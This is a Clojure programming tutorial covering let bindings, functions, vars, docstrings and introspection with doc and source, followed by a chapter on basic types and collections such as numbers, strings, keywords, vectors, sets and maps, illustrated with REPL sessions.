user=> (let [+ -] (+ 2 3)) -1

But that definition doesn’t apply outside the let:

user=> (+ 2 3) 5

We can also provide multiple bindings. Since Clojure doesn’t care about spacing, alignment, or newlines, I’ll write this on multiple lines for clarity.

user=> (let [person "joseph"
             num-cats 186]
         (str person " has " num-cats " cats!"))
"joseph has 186 cats!"

When multiple bindings are given, they are evaluated in order. Later bindings can use previous bindings.

user=> (let [cats 3
             legs (* 4 cats)]
         (str legs " legs all together"))
"12 legs all together"

So fundamentally, let defines the meaning of symbols within an expression. When Clojure evaluates a let, it replaces all occurrences of those symbols in the rest of the let expression with their corresponding values, then evaluates the rest of the expression.

Functions

We saw in chapter one that Clojure evaluates lists by substituting some other value in their place:

user=> (inc 1) 2

inc takes any number, and is replaced by that number plus one. That sounds an awful lot like a let:

user=> (let [x 1] (+ x 1)) 2

If we bound x to 5 instead of 1, this expression would evaluate to 6. We can think about inc like a let expression, but without particular values provided for the symbols.

(let [x] (+ x 1))

We can’t actually evaluate this program, because there’s no value for x yet. It could be 1, or 4, or 1453. We say that x is unbound, because it has no binding to a particular value. This is the nature of the function: an expression with unbound symbols.

user=> (fn [x] (+ x 1)) #<user$eval293$fn__294 user$eval293$fn__294@663fc37>

Does the name of that function remind you of anything?

user=> inc #<core$inc clojure.core$inc@16bc0b3c>

Almost all verbs in Clojure are functions. Functions represent unrealized computation: expressions which are not yet evaluated, or incomplete. This particular function works just like inc: it’s an expression which has a single unbound symbol, x. When we invoke the function with a particular value, the expressions in the function are evaluated with x bound to that value.

user=> (inc 2)
3
user=> ((fn [x] (+ x 1)) 2)
3

We say that x is this function's argument, or parameter. When Clojure evaluates (inc 2), we say that inc is called with 2, or that 2 is passed to inc. The result of that function invocation is the function’s return value. We say that (inc 2) returns 3.

Fundamentally, functions describe the relationship between arguments and return values: given 1, return 2. Given 2, return 3, and so on. Let bindings describe a similar relationship, but with a specific set of values for those arguments. let is evaluated immediately, whereas fn is evaluated later, when bindings are provided.
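One way to see that relationship concretely: invoking a function with a value behaves like a let which binds the parameter to that value. Both of these evaluate to 6:

```clojure
;; let binds x immediately...
(let [x 5] (+ x 1))
;; ...while fn defers the binding until the function is called.
((fn [x] (+ x 1)) 5)
```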

There’s a shorthand for writing functions, too: #(+ % 1) is equivalent to (fn [x] (+ x 1)). % takes the place of the first argument to the function. You’ll sometimes see %1, %2, etc. used for the first argument, second argument, and so on.

user=> (let [burrito #(list "beans" % "cheese")] (burrito "carnitas")) ("beans" "carnitas" "cheese")

Since functions exist to defer evaluation, there’s no sense in creating and invoking them in the same expression as we’ve done here. What we want is to give names to our functions, so they can be recombined in different ways.

user=> (let [twice (fn [x] (* 2 x))] (+ (twice 1) (twice 3))) 8

Compare that expression to an equivalent, expanded form:

user=> (+ (* 2 1) (* 2 3))

The name twice is gone, and in its place is the same sort of computation–(* 2 something)–written twice. While we could represent our programs as a single massive expression, it’d be impossible to reason about. Instead, we use functions to compact redundant expressions, by isolating common patterns of computation. Symbols help us re-use those functions (and other values) in more than one place. By giving the symbols meaningful names, we make it easier to reason about the structure of the program as a whole; breaking it up into smaller, understandable parts.

This is the core pursuit of software engineering: organizing expressions. Almost every programming language is in search of the right tools to break apart, name, and recombine expressions to solve large problems. In Clojure we’ll see one particular set of tools for composing programs, but the underlying ideas will transfer to many other languages.

Vars

We’ve used let to define a symbol within an expression, but what about the default meanings of +, conj, and type? Are they also let bindings? Is the whole universe one giant let?

Well, not exactly. That’s one way to think about default bindings, but it’s brittle. We’d need to wrap our whole program in a new let expression every time we wanted to change the meaning of a symbol. And moreover, once a let is defined, there’s no way to change it. If we want to redefine symbols for everyone–even code that we didn’t write–we need a new construct: a mutable variable.

user=> (def cats 5)
#'user/cats
user=> (type #'user/cats)
clojure.lang.Var

def defines a type of value we haven’t seen before: a var. Vars, like symbols, are references to other values. When evaluated, a symbol pointing to a var is replaced by the var’s corresponding value:

user=> user/cats 5

def also binds the symbol cats (and its globally qualified equivalent user/cats) to that var.

user=> user/cats
5
user=> cats
5

When we said in chapter one that inc, list, and friends were symbols that pointed to functions, that wasn’t the whole story. The symbol inc points to the var #'inc, which in turn points to the function #<core$inc clojure.core$inc@16bc0b3c>. We can see the intermediate var with resolve:

user=> 'inc
inc ; the symbol
user=> (resolve 'inc)
#'clojure.core/inc ; the var
user=> (eval 'inc)
#<core$inc clojure.core$inc@16bc0b3c> ; the value

Why two layers of indirection? Because unlike the symbol, we can change the meaning of a Var for everyone, globally, at any time.

user=> (def astronauts [])
#'user/astronauts
user=> (count astronauts)
0
user=> (def astronauts ["Sally Ride" "Guy Bluford"])
#'user/astronauts
user=> (count astronauts)
2

Notice that astronauts had two distinct meanings, depending on when we evaluated it. After the first def, astronauts was an empty vector. After the second def, it contained two names.

If this seems dangerous, you’re a smart cookie. Redefining names in this way changes the meaning of expressions everywhere in a program, without warning. Expressions which relied on the value of a Var could suddenly take on new, possibly incorrect, meanings. It’s a powerful tool for experimenting at the REPL, and for updating a running program, but it can have unexpected consequences. Good Clojurists use def to set up a program initially, and only change those definitions with careful thought.

Totally redefining a Var isn’t the only option. There are safer, controlled ways to change the meaning of a Var within a particular part of a program, which we’ll explore later.
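As a rough preview of one such mechanism–a sketch, since we haven’t covered dynamic Vars yet–the binding form temporarily overrides a Var marked ^:dynamic, and only within its own scope:

```clojure
;; A sketch of one safer mechanism: dynamic vars. The ^:dynamic
;; tag (and the *earmuffs* naming convention) marks a var as
;; intended for temporary rebinding.
(def ^:dynamic *debug* false)

(defn log [msg]
  (when *debug*
    (println msg)))

;; Within this binding, *debug* is true; once the binding form
;; ends, the original value is untouched.
(binding [*debug* true]
  (log "only printed here"))
```

Unlike a second def, the override evaporates when the binding form exits, so the rest of the program never sees the change.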

Defining functions

Armed with def, we’re ready to create our own named functions in Clojure.

user=> (def half (fn [number] (/ number 2)))
#'user/half
user=> (half 6)
3

Creating a function and binding it to a var is so common that it has its own form: defn, short for def fn.

user=> (defn half [number] (/ number 2))
#'user/half

Functions don’t have to take an argument. We’ve seen functions which take zero arguments, like (+).

user=> (defn half [] 1/2)
#'user/half
user=> (half)
1/2

But if we try to use our earlier form with one argument, Clojure complains that the arity–the number of arguments to the function–is incorrect.

user=> (half 10)
ArityException Wrong number of args (1) passed to: user$half clojure.lang.AFn.throwArity (AFn.java:437)

To handle multiple arities, functions have an alternate form. Instead of an argument vector and a body, one provides a series of lists, each of which starts with an argument vector, followed by the body.

user=> (defn half
         ([]  1/2)
         ([x] (/ x 2)))
#'user/half
user=> (half)
1/2
user=> (half 10)
5

Multiple arguments work just like you expect. Just specify an argument vector of two, or three, or however many arguments the function takes.

user=> (defn add [x y] (+ x y))
#'user/add
user=> (add 1 2)
3

Some functions can take any number of arguments. For that, Clojure provides &, which slurps up all remaining arguments as a list:

user=> (defn vargs [x y & more-args]
         {:x    x
          :y    y
          :more more-args})
#'user/vargs
user=> (vargs 1)
ArityException Wrong number of args (1) passed to: user$vargs clojure.lang.AFn.throwArity (AFn.java:437)
user=> (vargs 1 2)
{:x 1, :y 2, :more nil}
user=> (vargs 1 2 3 4 5)
{:x 1, :y 2, :more (3 4 5)}

Note that x and y are mandatory, though there don’t have to be any remaining arguments.

To keep track of what arguments a function takes, why the function exists, and what it does, we usually include a docstring. Docstrings help fill in the missing context around functions, to explain their assumptions, context, and purpose to the world.

(defn launch
  "Launches a spacecraft into the given orbit by initiating a
  controlled on-axis burn. Does not automatically stage, but
  does vector thrust, if the craft supports it."
  [craft target-orbit]
  "OK, we don't know how to control spacecraft yet.")

Docstrings are used to automatically generate documentation for Clojure programs, but you can also access them from the REPL.

user=> (doc launch)
-------------------------
user/launch
([craft target-orbit])
  Launches a spacecraft into the given orbit by initiating a
  controlled on-axis burn. Does not automatically stage, but
  does vector thrust, if the craft supports it.
nil

doc tells us the full name of the function, the arguments it accepts, and its docstring. This information comes from the #'launch var’s metadata, and is saved there by defn. We can inspect metadata directly with the meta function:

user=> (meta #'launch)
{:arglists ([craft target-orbit]),
 :ns #<Namespace user>,
 :name launch,
 :column 1,
 :doc "Launches a spacecraft into the given orbit by initiating a\n  controlled on-axis burn. Does not automatically stage, but\n  does vector thrust, if the craft supports it.",
 :line 1,
 :file "NO_SOURCE_PATH"}

There’s some other juicy information in there, like the file the function was defined in and which line and column it started at, but that’s not particularly useful since we’re in the REPL, not a file. However, this does hint at a way to answer our motivating question: how does the type function work?

How does type work?

We know that type returns the type of an object:

user=> (type 2)
java.lang.Long

And that type, like all functions, is a kind of object with its own unique type:

user=> type
#<core$type clojure.core$type@39bda9b9>
user=> (type type)
clojure.core$type

This tells us that type is a particular instance, at memory address 39bda9b9, of the type clojure.core$type. clojure.core is a namespace which defines the fundamentals of the Clojure language, and $type tells us that it’s named type in that namespace. None of this is particularly helpful, though. Maybe we can find out more about clojure.core$type by asking what its supertypes are:

user=> (supers (type type))
#{clojure.lang.AFunction clojure.lang.IMeta java.util.concurrent.Callable
  clojure.lang.Fn clojure.lang.AFn java.util.Comparator java.lang.Object
  clojure.lang.RestFn clojure.lang.IObj java.lang.Runnable
  java.io.Serializable clojure.lang.IFn}

This is a set of all the types that include type. We say that type is an instance of clojure.lang.AFunction, or that it implements or extends java.util.concurrent.Callable, and so on. Since it’s a member of clojure.lang.IMeta it has metadata, and since it’s a member of clojure.lang.AFn, it’s a function. Just to double check, let’s confirm that type is indeed a function:

user=> (fn? type)
true

What about its documentation?

user=> (doc type)
-------------------------
clojure.core/type
([x])
  Returns the :type metadata of x, or its Class if none
nil

Ah, that’s helpful. type can take a single argument, which it calls x. If it has :type metadata, that’s what it returns. Otherwise, it returns the class of x. Let’s take a deeper look at type’s metadata for more clues.

user=> (meta #'type)
{:ns #<Namespace clojure.core>,
 :name type,
 :arglists ([x]),
 :column 1,
 :added "1.0",
 :static true,
 :doc "Returns the :type metadata of x, or its Class if none",
 :line 3109,
 :file "clojure/core.clj"}

Look at that! This function was first added to Clojure in version 1.0, and is defined in the file clojure/core.clj, on line 3109. We could go dig up the Clojure source code and read its definition there–or we could ask Clojure to do it for us:

user=> (source type)
(defn type
  "Returns the :type metadata of x, or its Class if none"
  {:added "1.0"
   :static true}
  [x]
  (or (get (meta x) :type) (class x)))
nil

Aha! Here, at last, is how type works. It’s a function which takes a single argument x, and returns either :type from its metadata, or (class x).

We can delve into any function in Clojure using these tools:

user=> (source +)
(defn +
  "Returns the sum of nums. (+) returns 0. Does not auto-promote
  longs, will throw on overflow. See also: +'"
  {:inline (nary-inline 'add 'unchecked_add)
   :inline-arities >1?
   :added "1.2"}
  ([] 0)
  ([x] (cast Number x))
  ([x y] (. clojure.lang.Numbers (add x y)))
  ([x y & more]
   (reduce1 + (+ x y) more)))
nil

Almost every function in a programming language is made up of other, simpler functions. +, for instance, is defined in terms of cast, add, and reduce1. Sometimes functions are defined in terms of themselves: + uses itself twice in this definition, a technique called recursion.

At the bottom, though, are certain fundamental constructs below which you can go no further. Core axioms of the language. Lisp calls these “special forms”. def and let are special forms (well–almost: let is a thin wrapper around let*, which is a special form) in Clojure. These forms are defined by the core implementation of the language, and are not reducible to other Clojure expressions.

user=> (source def)
Source not found

Some Lisps are written entirely in terms of a few special forms, but Clojure is much less pure. Many functions bottom out in Java functions and types, or, for CLJS, in terms of Javascript. Any time you see an expression like (. clojure.lang.Numbers (add x y)), there’s Java code underneath. Below Java lies the JVM, which might be written in C or C++, depending on which one you use. And underneath C and C++ lie more libraries, the operating system, assembler, microcode, registers, and ultimately, electrons flowing through silicon.

A well-designed language isolates you from details you don’t need to worry about, like which logic gates or registers to use, and lets you focus on the task at hand. Good languages also need escape hatches, for performance or for access to dangerous functionality, as we saw with Vars. You can write entire programs purely in terms of Clojure, but sometimes, for performance or to use tools from other languages, you’ll rely on Java. Clojure code is easy to explore with doc and source, but Java can be more opaque–I usually rely on the Java source files and online documentation.

Review

We’ve seen how let associates names with values in a particular expression, and how Vars allow for mutable bindings which apply universally, and whose definitions can change over time. We learned that Clojure verbs are functions, which express the general shape of an expression but with certain values unbound. Invoking a function binds those variables to specific values, allowing evaluation of the function to proceed.

Functions decompose programs into simpler pieces, expressed in terms of one another. Short, meaningful names help us understand what those functions (and other values) mean.

Finally, we learned how to introspect Clojure functions with doc and source, and saw the definition of some basic Clojure functions. The Clojure cheatsheet gives a comprehensive list of the core functions in the language, and is a great starting point when you have to solve a problem but don’t know what functions to use.

We’ll see a broad swath of those functions in Chapter 4: Sequences.

My thanks to Zach Tellman, Kelly Sommers, and Michael R Bernstein for reviewing drafts of this chapter.

We’ve learned the basics of Clojure’s syntax and evaluation model. Now we’ll take a tour of the basic nouns in the language.

Types

We’ve seen a few different values already–for instance, nil, true, false, 1, 2.34, and "meow". Clearly all these things are different values, but some of them seem more alike than others.

For instance, 1 and 2 are very similar numbers; both can be added, divided, multiplied, and subtracted. 2.34 is also a number, and acts very much like 1 and 2, but it’s not quite the same. It’s got decimal points. It’s not an integer. And clearly true is not very much like a number. What is true plus one? Or false divided by 5.3? These questions are poorly defined.

We say that a type is a group of values which work in the same way. It’s a property that some values share, which allows us to organize the world into sets of similar things. 1 + 1 and 1 + 2 use the same addition, which adds together integers. Types also help us verify that a program makes sense: that you can only add together numbers, instead of adding numbers to porcupines.

Types can overlap and intersect each other. Cats are animals, and cats are fuzzy too. You could say that a cat is a member (or sometimes “instance”), of the fuzzy and animal types. But there are fuzzy things like moss which aren’t animals, and animals like alligators that aren’t fuzzy in the slightest.

Other types completely subsume one another. All tabbies are housecats, and all housecats are felidae, and all felidae are animals. Everything which is true of an animal is automatically true of a housecat. Hierarchical types make it easier to write programs which don’t need to know all the specifics of every value; and conversely, to create new types in terms of others. But they can also get in the way of the programmer, because not every useful classification (like “fuzziness”) is purely hierarchical. Expressing overlapping types in a hierarchy can be tricky.

Every language has a type system; a particular way of organizing nouns into types, figuring out which verbs make sense on which types, and relating types to one another. Some languages are strict, and others more relaxed. Some emphasize hierarchy, and others a more ad-hoc view of the world. We call Clojure’s type system strong in that operations on improper types are simply not allowed: the program will explode if asked to subtract a dandelion. We also say that Clojure’s types are dynamic because they are enforced when the program is run, instead of when the program is first read by the computer.

We’ll learn more about the formal relationships between types later, but for now, keep this in the back of your head. It’ll start to hook in to other concepts later.

Integers

Let’s find the type of the number 3:

user=> (type 3)
java.lang.Long

So 3 is a java.lang.Long, or a “Long”, for short. Because Clojure is built on top of Java, many of its types are plain old Java types.

Longs, internally, are represented as a group of sixty-four binary digits (ones and zeroes), written down in a particular pattern called signed two’s complement representation. You don’t need to worry about the specifics–there are only two things to remember about longs. First, longs use one bit to store the sign: whether the number is positive or negative. Second, the other 63 bits represent the size of the number. That means the biggest number you can represent with a long is 2^63 - 1 (the minus one is because of the number 0), and the smallest long is -2^63.

How big is 2^63 - 1?

user=> Long/MAX_VALUE
9223372036854775807

That’s a reasonably big number. Most of the time, you won’t need anything bigger, but… what if you did? What happens if you add one to the biggest Long?

user=> (inc Long/MAX_VALUE)
ArithmeticException integer overflow clojure.lang.Numbers.throwIntOverflow (Numbers.java:1388)

An error occurs! This is Clojure telling us that something went wrong. The type of error was an ArithmeticException, and its message was “integer overflow”, meaning “this type of number can’t hold a number that big”. The error came from a specific place in the source code of the program: Numbers.java, on line 1388. That’s a part of the Clojure source code. Later, we’ll learn more about how to unravel error messages and find out what went wrong.

The important thing is that Clojure’s type system protected us from doing something dangerous; instead of returning a corrupt value, it aborted evaluation and returned an error.

If you do need to talk about really big numbers, you can use a BigInt: an arbitrary-precision integer. Let’s convert the biggest Long into a BigInt, then increment it:

user=> (inc (bigint Long/MAX_VALUE))
9223372036854775808N

Notice the N at the end? That’s how Clojure writes arbitrary-precision integers.

user=> (type 5N)
clojure.lang.BigInt

There are also smaller numbers.

user=> (type (int 0))
java.lang.Integer
user=> (type (short 0))
java.lang.Short
user=> (type (byte 0))
java.lang.Byte

Integers are half the size of Longs; they store values in 32 bits. Shorts are 16 bits, and Bytes are 8. That means their biggest values are 2^31 - 1, 2^15 - 1, and 2^7 - 1, respectively.

user=> Integer/MAX_VALUE
2147483647
user=> Short/MAX_VALUE
32767
user=> Byte/MAX_VALUE
127

Fractional numbers

To represent numbers between integers, we often use floating-point numbers, which can represent small numbers with fine precision, and large numbers with coarse precision. Floats use 32 bits, and Doubles use 64. Doubles are the default in Clojure.

user=> (type 1.23)
java.lang.Double
user=> (type (float 1.23))
java.lang.Float

Floating point math is complicated, and we won’t get bogged down in the details just yet. The important thing to know is floats and doubles are approximations. There are limits to their correctness:

user=> 0.99999999999999999
1.0

To represent fractions exactly, we can use the ratio type:

user=> (type 1/3)
clojure.lang.Ratio
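To see the contrast directly, here’s a short sketch: the doubles 0.1 and 0.2 can’t be represented exactly in binary, but the equivalent ratios can.

```clojure
;; 0.1 and 0.2 are binary approximations, so their sum
;; picks up a tiny error in the last decimal place.
(+ 0.1 0.2)
; => 0.30000000000000004

;; Ratios are exact, so the same sum has no error.
(+ 1/10 2/10)
; => 3/10
```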

Mathematical operations

The exact behavior of mathematical operations in Clojure depends on their types. In general, though, Clojure aims to preserve information. Adding two longs returns a long; adding a double and a long returns a double.

user=> (+ 1 2)
3
user=> (+ 1 2.0)
3.0

3 and 3.0 are not the same number; one is a long, and the other a double. But for most purposes, they’re equivalent, and Clojure will tell you so:

user=> (= 3 3.0)
false
user=> (== 3 3.0)
true

= asks whether all the things that follow are equal. Since floats are approximations, = considers them different from integers. == also compares things, but a little more loosely: it considers integers equivalent to their floating-point representations.

We can also subtract with -, multiply with *, and divide with /.

user=> (- 3 1)
2
user=> (* 1.5 3)
4.5
user=> (/ 1 2)
1/2

Putting the verb first in each list allows us to add or multiply more than one number in the same step:

user=> (+ 1 2 3)
6
user=> (* 2 3 1/5)
6/5

Subtraction with more than 2 numbers subtracts all later numbers from the first. Division divides the first number by all the rest.

user=> (- 5 1 1 1)
2
user=> (/ 24 2 3)
4

By extension, we can define useful interpretations for numeric operations with just a single number:

user=> (+ 2)
2
user=> (- 2)
-2
user=> (* 4)
4
user=> (/ 4)
1/4

We can also add or multiply a list of no numbers at all, obtaining the additive and multiplicative identities, respectively. This might seem odd, especially coming from other languages, but we’ll see later that these generalizations make it easier to reason about higher-level numeric operations.

user=> (+)
0
user=> (*)
1

Often, we want to ask which number is bigger, or if one number falls between two others. <= means “less than or equal to”, and asserts that all following values are in order from smallest to biggest.

user=> (<= 1 2 3)
true
user=> (<= 1 3 2)
false

< means “strictly less than”, and works just like <=, except that no two values may be equal.

user=> (<= 1 1 2)
true
user=> (< 1 1 2)
false

Their friends > and >= mean “greater than” and “greater than or equal to”, respectively, and assert that numbers are in descending order.

user=> (> 3 2 1)
true
user=> (> 1 2 3)
false

Also commonly used are inc and dec, which add and subtract one to a number, respectively:

user=> (inc 5)
6
user=> (dec 5)
4

One final note: equality tests can take more than 2 numbers as well.

user=> (= 2 2 2)
true
user=> (= 2 2 3)
false

Strings

We saw that strings are text, surrounded by double quotes, like "foo". Strings in Clojure are, like Longs, Doubles, and company, backed by a Java type:

user=> (type "cat")
java.lang.String

We can make almost anything into a string with str. Strings, symbols, numbers, booleans; every value in Clojure has a string representation. Note that nil’s string representation is ""; an empty string.

user=> (str "cat")
"cat"
user=> (str 'cat)
"cat"
user=> (str 1)
"1"
user=> (str true)
"true"
user=> (str '(1 2 3))
"(1 2 3)"
user=> (str nil)
""

str can also combine things together into a single string, which we call “concatenation”.

user=> (str "meow " 3 " times")
"meow 3 times"

To look for patterns in text, we can use a regular expression, which is a tiny language for describing particular arrangements of text. re-find and re-matches look for occurrences of a regular expression in a string. To find a cat:

user=> (re-find #"cat" "mystic cat mouse")
"cat"
user=> (re-find #"cat" "only dogs here")
nil

That #"..." is Clojure’s way of writing a regular expression.

With re-matches, you can extract particular parts of a string which match an expression. Here we find two strings, separated by a :. The parentheses mean that the regular expression should capture that part of the match. We get back a list containing the part of the string that matched the first parentheses, followed by the part that matched the second parentheses.

user=> (rest (re-matches #"(.+):(.+)" "mouse:treat"))
("mouse" "treat")

Regular expressions are a powerful tool for searching and matching text, especially when working with data files. Since regexes work the same in most languages, you can use any guide online to learn more. It’s not something you have to master right away; just learn specific tricks as you find you need them. For a deeper guide, try Fitzgerald’s Introducing Regular Expressions.
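One related helper worth knowing–re-seq, a standard clojure.core function not shown above–returns every match in a string, not just the first:

```clojure
;; re-seq finds all non-overlapping matches, in order.
;; \d+ matches one or more digits.
(re-seq #"\d+" "1 fish 22 fish 333 fish")
; => ("1" "22" "333")
```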

Booleans and logic

Everything in Clojure has a sort of charge, a truth value, sometimes called “truthiness”. true is positive and false is negative. nil is negative, too.

user=> (boolean true)
true
user=> (boolean false)
false
user=> (boolean nil)
false

Every other value in Clojure is positive.

user=> (boolean 0)
true
user=> (boolean 1)
true
user=> (boolean "hi there")
true
user=> (boolean str)
true

If you’re coming from a C-inspired language, where 0 is considered false, this might be a bit surprising. Likewise, in much of POSIX, 0 is considered success and nonzero values are failures. Lisp allows no such confusion: the only negative values are false and nil.

We can reason about truth values using and, or, and not. and returns the first negative value, or the last value if all are positive.

user=> (and true false true)
false
user=> (and true true true)
true
user=> (and 1 2 3)
3

Similarly, or returns the first positive value, or the last value if none are positive.

user=> (or false 2 3)
2
user=> (or false nil)
nil

And not inverts the logical sense of a value:

user=> (not 2)
false
user=> (not nil)
true

We’ll learn more about Boolean logic when we start talking about control flow; the way we alter evaluation of a program and express ideas like “if I’m a cat, then meow incessantly”.

Symbols

We saw symbols in the previous chapter; they’re bare strings of characters, like foo or +.

user=> (class 'str)
clojure.lang.Symbol

Symbols can have either short or full names. The short name is used to refer to things locally. The fully qualified name is used to refer unambiguously to a symbol from anywhere. If I were a symbol, my name would be “Kyle”, and my full name “Kyle Kingsbury.”

The two parts of a fully qualified name are separated with a /. For instance, the symbol str is also present in a family called clojure.core; the corresponding full name is clojure.core/str.

user=> (= str clojure.core/str)
true
user=> (name 'clojure.core/str)
"str"

When we talked about the maximum size of an integer, that was a fully-qualified symbol, too.

user=> (type 'Integer/MAX_VALUE)
clojure.lang.Symbol

The job of symbols is to refer to things, to point to other values. When evaluating a program, symbols are looked up and replaced by their corresponding values. That’s not the only use of symbols, but it’s the most common.

Keywords

Closely related to symbols and strings are keywords, which begin with a :. Keywords are like strings in that they’re made up of text, but are specifically intended for use as labels or identifiers. These aren’t labels in the sense of symbols: keywords aren’t replaced by any other value. They’re just names, by themselves.

user=> (type :cat)
clojure.lang.Keyword
user=> (str :cat)
":cat"
user=> (name :cat)
"cat"

As labels, keywords are most useful when paired with other values in a collection, like a map. Keywords can also be used as verbs to look up specific values in other data types. We’ll learn more about keywords shortly.

Lists

A collection is a group of values. It’s a container which provides some structure, some framework, for the things that it holds. We say that a collection contains elements, or members. We saw one kind of collection–a list–in the previous chapter.

user=> '(1 2 3)
(1 2 3)
user=> (type '(1 2 3))
clojure.lang.PersistentList

Remember, we quote lists with a ' to prevent them from being evaluated. You can also construct a list using list:

user=> (list 1 2 3)
(1 2 3)

Lists are comparable just like every other value:

user=> (= (list 1 2) (list 1 2))
true

You can modify a list by conjoining an element onto it:

user=> (conj '(1 2 3) 4)
(4 1 2 3)

We added 4 to the list–but it appeared at the front. Why? Internally, lists are stored as a chain of values: each link in the chain is a tiny box which holds the value and a connection to the next link. This data structure, called a linked list, offers immediate access to the first element.

user=> (first (list 1 2 3))
1

But getting to the second element requires an extra hop down the chain

user=> (second (list 1 2 3))
2

and the third element a hop after that, and so on.

user=> (nth (list 1 2 3) 2)
3

nth gets the element of an ordered collection at a particular index. The first element is index 0, the second is index 1, and so on.

This means that lists are well-suited for small collections, or collections which are read in linear order, but are slow when you want to get arbitrary elements from later in the list. For fast access to every element, we use a vector.

Vectors

Vectors are surrounded by square brackets, just like lists are surrounded by parentheses. Because vectors aren’t evaluated like lists are, there’s no need to quote them:

user=> [1 2 3]
[1 2 3]
user=> (type [1 2 3])
clojure.lang.PersistentVector

You can also create vectors with vector, or change other structures into vectors with vec:

user=> (vector 1 2 3)
[1 2 3]
user=> (vec (list 1 2 3))
[1 2 3]

conj on a vector adds to the end, not the start:

user=> (conj [1 2 3] 4)
[1 2 3 4]

Our friends first, second, and nth work here too; but unlike lists, nth is fast on vectors. That’s because internally, vectors are represented as a very broad tree of elements, where each part of the tree branches into 32 smaller trees. Even very large vectors are only a few layers deep, which means getting to elements only takes a few hops.

In addition to first, you’ll often want to get the remaining elements in a collection. There are two ways to do this:

user=> (rest [1 2 3])
(2 3)
user=> (next [1 2 3])
(2 3)

rest and next both return “everything but the first element”. They differ only by what happens when there are no remaining elements:

user=> (rest [1])
()
user=> (next [1])
nil

With no elements remaining, rest returns the empty list, which is logical true; next returns nil, which is logical false. Each has their uses, but in almost every case they’re equivalent–I interchange them freely.

We can get the final element of any collection with last:

user=> (last [1 2 3])
3

And figure out how big the vector is with count:

user=> (count [1 2 3])
3

Because vectors are intended for looking up elements by index, we can also use them directly as verbs:

user=> ([:a :b :c] 1)
:b

So we took the vector containing three keywords, and asked “What’s the element at index 1?” Lisp, like most (but not all!) modern languages, counts up from zero, not one. Index 0 is the first element, index 1 is the second element, and so on. In this vector, finding the element at index 1 evaluates to :b.

Finally, note that vectors and lists containing the same elements are considered equal in Clojure:

user=> (= '(1 2 3) [1 2 3])
true

In almost all contexts, you can consider vectors, lists, and other sequences as interchangeable. They only differ in their performance characteristics, and in a few data-structure-specific operations.
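For example, lists and vectors compare as equal, yet conj–one of those data-structure-specific operations–behaves differently on each, as we saw earlier:

```clojure
;; Equal as sequences of the same elements...
(= '(1 2 3) [1 2 3])
; => true

;; ...but conj prepends to lists and appends to vectors.
(conj '(1 2 3) 0)
; => (0 1 2 3)
(conj [1 2 3] 4)
; => [1 2 3 4]
```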

Sets

Sometimes you want an unordered collection of values; especially when you plan to ask questions like “does the collection have the number 3 in it?” Clojure, like most languages, calls these collections sets.

user=> #{:a :b :c}
#{:a :c :b}

Sets are surrounded by #{...}. Notice that though we gave the elements :a, :b, and :c, they came out in a different order. In general, the order of sets can shift at any time. If you want a particular order, you can ask for it as a list or vector:

user=> (vec #{:a :b :c})
[:a :c :b]

Or ask for the elements in sorted order:

user=> (sort #{:a :b :c})
(:a :b :c)

conj on a set adds an element:

user=> (conj #{:a :b :c} :d)
#{:a :c :b :d}
user=> (conj #{:a :b :c} :a)
#{:a :c :b}

Sets never contain an element more than once, so conjing an element which is already present does nothing. Conversely, one removes elements with disj:

user=> (disj #{"hornet" "hummingbird"} "hummingbird")
#{"hornet"}

The most common operation with a set is to check whether something is inside it. For this we use contains?.

user=> (contains? #{1 2 3} 3)
true
user=> (contains? #{1 2 3} 5)
false

Like vectors, you can use the set itself as a verb. Unlike contains?, this expression returns the element itself (if it was present), or nil.

user=> (#{1 2 3} 3)
3
user=> (#{1 2 3} 4)
nil

You can make a set out of any other collection with set.

user=> (set [:a :b :c])
#{:a :c :b}

Maps

The last collection on our tour is the map: a data structure which associates keys with values. In a dictionary, the keys are words and the definitions are the values. In a library, keys are call numbers, and the books are values. Maps are indexes for looking things up, and for representing different pieces of named information together. Here’s a cat:

user=> {:name "mittens" :weight 9 :color "black"}
{:weight 9, :name "mittens", :color "black"}

Maps are surrounded by braces {...}, filled by alternating keys and values. In this map, the three keys are :name, :color, and :weight, and their values are "mittens", "black", and 9, respectively. We can look up the corresponding value for a key with get:

user=> (get {"cat" "meow" "dog" "woof"} "cat")
"meow"
user=> (get {:a 1 :b 2} :c)
nil

get can also take a default value to return instead of nil, if the key doesn’t exist in that map.

user=> (get {:glinda :good} :wicked :not-here)
:not-here

Since lookups are so important for maps, we can use a map as a verb directly:

user=> ({"amlodipine" 12 "ibuprofen" 50} "ibuprofen")
50

And conversely, keywords can also be used as verbs, which look themselves up in maps:

user=> (:raccoon {:weasel "queen" :raccoon "king"})
"king"
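Like get, a keyword used as a verb also accepts a default value as a second argument–a small but handy variation:

```clojure
;; When the key is absent, the default is returned instead of nil.
(:raccoon {:weasel "queen"} :missing)
; => :missing
```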

You can add a value for a given key to a map with assoc.

user=> (assoc {:bolts 1088} :camshafts 3)
{:camshafts 3, :bolts 1088}
user=> (assoc {:camshafts 3} :camshafts 2)
{:camshafts 2}

Assoc adds keys if they aren’t present, and replaces values if they’re already there. If you associate a value onto nil, it creates a new map.

user=> (assoc nil 5 2)
{5 2}

You can combine maps together using merge, which yields a map containing all the elements of all given maps, preferring the values from later ones.

user=> (merge {:a 1 :b 2} {:b 3 :c 4})
{:c 4, :a 1, :b 3}

Finally, to remove a value, use dissoc.

user=> (dissoc {:potatoes 5 :mushrooms 2} :mushrooms)
{:potatoes 5}

Putting it all together

All these collections and types can be combined freely. As software engineers, we model the world by creating a particular representation of the problem in the program. Having a rich set of values at our disposal allows us to talk about complex problems. We might describe a person:

{:name "Amelia Earhart"
 :birth 1897
 :death 1939
 :awards {"US"    #{"Distinguished Flying Cross" "National Women's Hall of Fame"}
          "World" #{"Altitude record for Autogyro" "First to cross Atlantic twice"}}}

Or a recipe:

{:title "Chocolate chip cookies"
 :ingredients {"flour"           [(+ 2 1/4) :cup]
               "baking soda"     [1   :teaspoon]
               "salt"            [1   :teaspoon]
               "butter"          [1   :cup]
               "sugar"           [3/4 :cup]
               "brown sugar"     [3/4 :cup]
               "vanilla"         [1   :teaspoon]
               "eggs"            2
               "chocolate chips" [12  :ounce]}}

Or the Gini coefficients of nations, as measured over time:

{"Afghanistan" {2008 27.8}
 "Indonesia"   {2008 34.1 2010 35.6 2011 38.1}
 "Uruguay"     {2008 46.3 2009 46.3 2010 45.3}}

In Clojure, we compose data structures to form more complex values; to talk about bigger ideas. We use operations like first, nth, get, and contains? to extract specific information from these structures, and modify them using conj, disj, assoc, dissoc, and so on.
